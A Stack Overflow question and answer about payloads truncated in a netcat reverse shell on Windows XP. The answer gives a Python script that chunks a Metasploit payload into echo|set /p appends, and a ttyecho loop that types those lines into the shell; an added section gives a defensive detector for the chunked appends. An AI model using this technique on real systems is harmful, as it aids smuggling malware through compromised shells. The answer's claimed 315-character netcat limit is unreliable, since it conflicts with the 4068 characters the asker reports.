How to send long string in netcat - cmd shell?

0

For security tests, a VBS script called msf.vbs is created, which is used to execute a payload generated by Metasploit. Example:

cscript.exe %temp%\msf.vbs <payload>

If the script is used in cmd.exe on localhost, everything goes well. But if it is used in a netcat cmd shell, the payload will be broken. Example:

  • original payload size: 6160
  • payload size handled by netcat: 4068

My questions are as follows:

  1. What's the reason that the whole payload is not transmitted?
  2. How to send a long string in a netcat cmd shell?

Crash demo

root@sh:~# nc -v -l -p 4444
listening on [any] 4444 ...
192.168.1.104: inverse host lookup failed: Unknown host
connect to [192.168.1.105] from (UNKNOWN) [192.168.1.104] 1749
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\test\Desktop>cscript.exe %temp%\msf.vbs <payload>
cscript.exe %temp%\msf.vbs <payload>
Microsoft (R) Windows Script Host Version 5.7
Copyright (C) Microsoft Corporation. All rights reserved.

C:\DOCUME~1\test\LOCALS~1\Temp\msf.vbs(1, 823) (null): 0x800700C1
asked on Stack Overflow Nov 1, 2016 by debug

1 Answer

0

What's the reason that the whole payload is not transmitted ?

There is a size limit in NC that prohibits any transmission longer than 315 chars. Your char length is 6,188.

How to send long string in netcat - cmd shell ?

Break it down. The following Python script will do that for you (it's set to break at 80 chars, which fits nice and neat into the terminals; credit for the script goes to: OS-18568), so the transmission works fine, and then rejoins them in the 123.hex file by using a technique in MS-DOS to echo several times into a single line:

#!/usr/bin/python

import sys

def split_by_length(s, block_size):
    # cut s into consecutive pieces of at most block_size characters
    w = []
    n = len(s)
    for i in range(0, n, block_size):
        w.append(s[i:i+block_size])
    # drop a trailing piece that contains only whitespace
    if w and w[-1].isspace():
        del w[-1]
    return w

with open(sys.argv[1]) as infile:
    for line in infile:
        line = line.rstrip('\n')
        # if line is longer than 80
        if len(line) > 80:
            # split line
            newlines = split_by_length(line, 80)
            # if line starts with space, create space at the end of previous line
            # echo|set /p and <nul set /p remove leading spaces/tabs and equal signs
            for index, newline in enumerate(newlines):
                # index 0 has no previous piece to carry the space
                if index > 0 and newline.startswith(" "):
                    newlines[index-1] = newlines[index-1] + " "
            # rewrite lines
            for index, newline in enumerate(newlines):
                # 1st line: remove echo and create line with no carriage return
                if index == 0:
                    newline = newline.replace("echo ", "", 1)
                    newline = 'echo|set /p="' + newline + '"  >>123.hex'
                # last line: add echo
                elif index == len(newlines)-1:
                    newline = "echo " + newline
                # middle lines: create line with no carriage return and add >> 123.hex
                else:
                    newline = 'echo|set /p="' + newline + '"  >>123.hex'
                print(newline)
        else:
            print(line)

The question that you didn't ask, but might be the next one -

How do I then get this broken down information into my terminal running my reverse shell?

You'll need the following application: ttyecho, found here: https://github.com/buglessdr/ttyecho

Then once that is done you can run the following small bash script to bring it all together:

while read -r line; do /git/ttyecho/ttyecho -n /dev/pts/0 "$line"; done < commandsplit.txt

Hint - to figure out which terminal has the session you can use the following command:

tty
answered on Stack Overflow Jul 19, 2017 by Bob
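
For defenders, the chunked `echo|set /p="..." >>file` rebuild that the script in the answer prints leaves a recognizable trail in command-line logs. The following is an added example, not part of the original answer or the credited script: it flags files that are rebuilt from several such appends. The log format, the name `find_staged_files`, the threshold and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# The no-newline append idiom the splitter script prints, e.g.
#   echo|set /p="<chunk>"  >>123.hex
# plus the `<nul set /p=` variant mentioned in its comments.
CHUNK_RE = re.compile(
    r'(?:echo\s*\|\s*|<\s*nul\s+)set\s+/p\s*=\s*"?(?P<chunk>[^">]*)"?'
    r'\s*>>\s*(?P<target>\S+)',
    re.IGNORECASE,
)
HEX_RE = re.compile(r'^[0-9a-fA-F\s]+$')


def find_staged_files(command_lines, min_chunks=3):
    """Group `set /p` appends by target file (case-insensitive) and return
    the files that were rebuilt from at least `min_chunks` pieces."""
    stats = defaultdict(lambda: {"chunks": 0, "chars": 0, "hex_chunks": 0})
    for cmd in command_lines:
        m = CHUNK_RE.search(cmd)
        if not m:
            continue
        entry = stats[m.group("target").lower()]
        entry["chunks"] += 1
        entry["chars"] += len(m.group("chunk"))
        # hex-only chunks suggest a binary being reassembled from text
        if HEX_RE.match(m.group("chunk")):
            entry["hex_chunks"] += 1
    return {t: s for t, s in stats.items() if s["chunks"] >= min_chunks}


# Constructed sample: command lines as a shell-session transcript or
# command-line audit log might record them (assumed format, not from the page).
SAMPLE_LOG = [
    'dir C:\\Users',
    'echo|set /p="4d5a9000"  >>123.hex',
    'echo|set /p="03000000"  >>123.hex',
    '<nul set /p="04000000"  >>123.HEX',
    'echo 0000ffff >>123.hex',                # plain echo: ends the line, not a chunk
    'echo|set /p="hello world" >>notes.txt',  # single append, below threshold
    'set /p name=Enter name: ',               # ordinary interactive prompt
]

if __name__ == "__main__":
    for target, s in find_staged_files(SAMPLE_LOG).items():
        print("%s: %d chunks, %d chars, %d hex-only"
              % (target, s["chunks"], s["chars"], s["hex_chunks"]))
```

Chunks that themselves contain `"` or `>` are not matched by this pattern, so treat a hit as a lead for review rather than a complete inventory of what was written.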

User contributions licensed under CC BY-SA 3.0